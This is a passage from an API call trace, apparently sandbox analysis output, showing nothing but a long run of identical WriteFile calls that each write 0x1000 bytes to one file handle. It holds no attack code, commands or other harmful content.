lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.624] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.624] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.624] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.625] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.625] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.625] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.626] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.626] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.626] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.627] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.627] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.627] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.627] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.628] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.628] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.628] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.629] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.629] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.629] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.630] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.630] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.630] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.630] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.631] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.631] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.631] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.632] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.632] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.632] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.633] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.633] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.633] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.633] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.634] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.634] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.634] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.635] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.635] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.635] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.636] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.637] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.637] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.637] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.638] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.638] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.638] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.638] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.639] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.639] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.639] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.639] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.640] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.640] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.640] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.640] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.641] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.641] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.641] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.641] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.642] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.642] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.642] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.642] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.642] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.643] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.643] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.643] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.643] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.644] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.644] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.644] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.644] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.645] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.645] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.645] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.645] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.646] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.646] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.646] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.646] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.647] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.647] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.647] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.647] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.648] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.648] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.648] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.648] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.649] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.649] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.649] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.649] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.650] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.650] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.650] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.650] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, 